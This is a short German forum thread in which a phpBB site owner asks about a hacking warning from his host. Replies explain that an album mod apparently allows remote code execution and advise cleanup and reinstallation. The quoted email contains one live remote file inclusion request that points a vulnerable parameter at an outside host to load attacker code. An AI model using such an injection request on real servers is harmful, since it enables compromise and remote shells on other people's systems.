Warnhinweis vom Provider

nagus · Beitrag von **nagus** » 11.09.2007 11:23

Hallo zusammen

Ich habe gerade folgende Mail von meinem Hoster bekommen:

The webserver ***.de resides on has been hacked. I'm
contacting you as you are listed as the technical contact for the
website.

http://***.de/phpbb/album_mod/album_nuffimage_box.php?album_root_path=http://callingplanetearth.org/coo4.zip?

Please ensure there is no malware and/or shells on the server.

Thank you

Was soll ich damit anfangen?

Beitrag von **bantu** » 11.09.2007 11:25

Vermutlich enthält dieser Album Mod gravierende Sicherheitslücken und ermöglicht den Versand von Spam über deinen Server.

Siehe auch: KB:gehackt.

larsneo · Beitrag von **larsneo** » 11.09.2007 11:49

dein album ermöglicht augenscheinlich eine sog. Remote Code Execution - nachdem man damit (je nach serverkonfiguration) z.b. auch eine remote shell installieren kann ist das eine ernsthafte sicherheitslücke. du solltest gemeinsam mit deinem provider kontrollieren, ob bereits schadcode auf dem system ist und die seite danach neu aufsetzen.

generelle sicherheitsinfos zum system liefert auch phpsecinfo.